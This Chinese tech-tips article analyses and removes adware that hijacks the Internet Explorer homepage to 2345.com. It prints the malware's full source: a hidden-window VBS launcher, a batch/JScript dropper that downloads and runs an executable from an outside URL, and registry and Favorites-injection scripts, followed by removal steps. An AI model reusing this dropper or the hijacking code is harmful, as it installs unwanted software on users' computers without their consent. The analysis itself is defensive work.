干掉臭名昭著的流氓2345.com篡改,行不?(1)
主页给改成了臭名昭著的2345.com,开始没在意:改了就改了吧,我再改回来吧。
当然,直接把主页改成about:blank肯定是没戏的,不过我也试了一下:万一好使呢?虽然结果不出所料的不好使。
再看一眼360安全卫士的锁定主页——居然还是空白页!解开锁定再锁定上也没用,这不得不说是360失败的地方……
不过这样也确定了,那就是流氓插件绑定的问题了。这个时候如果去注册表说不定会好使,不过有了360,那就用360清理插件吧,我也懒得自己去找注册表……【附:注册表关于IE主页的键值:HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain中的StartPage,直接修改成想要的主页就可以】
清理之后,不出所料有一个差评插件,清理之!之后按照提示重启
可是重启之后发现:NANI?还是不好使?再次清理之!这次就不要重启了,这时发现:主页已经被改回到正常的空白页了,说明360的清理是有效的,可是为什么重启之后又回来了呢?这个时候就可以确定,这家伙在启动项里做了手脚。WIN(就是键盘上那个微软的标志,一按会拉开开始菜单的那个按键)+R,输入msconfig,查看启动项:
发现他了!一个叫做kqidong.lnk的启动项,目标指向C:PROGR~1qidongqidong.vbs,这里就要解释一下:如果用过DOS(不是那个CMD批处理,就是DOS系统)的童鞋都会知道,当一个文件夹在电脑中的名字太长时,就会显示为“前几个字母+~+数字编号”的形式,这样目标就确定了:C:Program Filesqidongqidong.vbs这个时候其实问题就算是解决了,把这个文件夹C:Program Filesqidong删除肯定就没问题了,可是拥有求知欲的人永远是蛋疼的,我点了进去:
因为我的电脑设置成了不隐藏系统文件和显示所有文件和文件夹,所以我很轻松的看到了里面所包含的东西:kqidong.zip、qidong.bat、qidong.exe、qidong.vbs、xiazai.bat,其中qidong.exe是winrar 自解压格式,正好我也懒得反编译;我只扫了一眼就确定了:这个东东一定是国人弄得!(因为用的是汉语拼音……)
先查看那个qidong.vbs,用记事本看看他源码:右键——编辑,发现了里面的内容只有短短三行:
set Cleaner=createobject("wscript.shell")
Cleaner.run "qidong.bat",vbhide
Cleaner.run "xiazai.bat",vbhide
这三行代码的意思仅仅是在隐藏窗体的情况下运行qidong.bat和xiazai.bat两个批处理文件,那再看看这两个的源码吧,先是xiazai.bat,同样右键——编辑:
echo=1/*>nul&@cls
@echo off
call :http "http://www.jinrong800.com/baiduguangjia/qidong/qidong.exe" "C:Program Files"qidongqidong.exe"
@echo
start "" "C:Program Files"qidongqidong.exe
:http
echo Source: "%~1"
echo Destination: "%~f2"
echo Start downloading. . .
cscript -nologo -e:jscript "%~f0" "%~1" "%~2"
echo OK!
goto :eof
*/
var iLocal,iRemote,xPost,sGet;
iLocal =WScript.Arguments(1);
iRemote = WScript.Arguments(0);
iLocal=iLocal.toLowerCase();
iRemote=iRemote.toLowerCase();
xPost = new ActiveXObject("Microsoft"+String.fromCharCode(0x2e)+"XMLHTTP");
xPost.Open("GET",iRemote,0);
xPost.Send();
sGet = new ActiveXObject("ADODB"+String.fromCharCode(0x2e)+"Stream");
sGet.Mode = 3;
sGet.Type = 1;
sGet.Open();
sGet.Write(xPost.responseBody);
sGet.SaveToFile(iLocal,2);
看不懂?没关系!联系那个文件名和几个网址和地址我们就可以断定:这是用来下载那个自解压文件并解压的,那我们去看看那个自解压文件qidong.exe:右键——用Winrar打开,里面仅仅有着一个qidong.bat,在右面提示着
;下面的注释包含自解压脚本命令
Silent=1
Overwrite=1
这里我解释一下:Silent=1是静默状态下解压,不会弹出窗口,而Overwrite=1是如果有同名文件直接替换,保证了不会弹出:“XXX已经存在,是否覆盖”之类的提示来告诉你他在运行。
那么接下来看看qidong.bat,同样“右键——编辑”,可这次就不那么顺利了:里面全是乱码,这怎么办呢?还好我有神器:Notepad++,右键——Edit with Notepad++(UE当然也可以做到同样的事情),这次他就无处躲藏了,请看源码:
%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
cls
::设置主页并锁定
@REG ADD "HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand" /ve /t REG_EXPAND_SZ /d "C:Program FilesInternet Exploreriexplore.exe http://www.2345.com/?10688" /f
@reg add "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /d "http://www.2345.com/?10688" /f
::添加快捷方式到收藏夹
@echo off&setlocal enabledelayedexpansion
REG QUERY "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /v Favorites >%Temp%Favorites.txt
for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%Favorites.txt') do (
echo [InternetShortcut] >>%%k2345网址导航.url&echo URL="http://www.2345.com/?10688" >>%%k2345网址导航.url&del /f /s /q %Temp%Favorites.txt>nul
)
@echo off&setlocal enabledelayedexpansion
REG QUERY "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /v Favorites >%Temp%Favorites.txt
for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%Favorites.txt') do (
echo [InternetShortcut] >>%%k 什么电影都能搜索-你懂的.url&echo URL="http://www.ks888.net" >>%%k 什么电影都能搜索-你懂的.url&del /f /s /q %Temp%Favorites.txt>nul
)
@echo off&setlocal enabledelayedexpansion
REG QUERY "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /v Favorites >%Temp%Favorites.txt
for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%Favorites.txt') do (
echo [InternetShortcut] >>%%k1淘宝热卖.url&echo URL="http://www.taobao.com/go/chn/tbk_channel/channelcode.php?pid=mm_10836206_0_0&eventid=101329" >>%%k1淘宝热卖.url&del /f /s /q %Temp%Favorites.txt>nul
)
居然连注释都有……这流氓软件的作者还真可爱,正好也省去了多费口舌解释,这样通过开机启动项里面运行的qidong.vbs,即使文件被360干掉了他也能保证每次开机都重新缠上你,果然是“臭牛氓”!
而那个kqidong.zip中装的就是kqidong.lnk则是最开始启动项里面的那个,直接指向C:Program Filesqidongqidong.vbs
至此我们已经完整的掌握了这个万恶的2345.com的流氓团伙的信息,可以直接干掉他了!
通过随便一个清理插件的工具清理掉插件、之后打开msconfig,ban掉kqidong.lnk这个启动项,再把C盘Program Files下的qidong文件夹删除,这个臭牛氓就被彻底的请出电脑了!不过记得最后一步:把主页改回来,最好去上面给出了注册表项里面查看一下Startpage,是不是已经改过来了,如果没改过来就处理一下吧。
责任编辑: webmaster >>> 百度上搜索 谷歌上搜索
点击复制本连接 (http://www.hugesky.com/showarticle.php?id=6963)>>> 相关资讯:
【声明】: 以上文章或资料除注明为电脑技巧原创或编辑整理外,均为网络收集整理或网友推荐。以上内容以共享、参考、研究为目的,不存在任何商业目的。 未注明作者或出处的文章,可能资料来源不规范。如有涉及版权请给予及时联系更正或予以删除。 |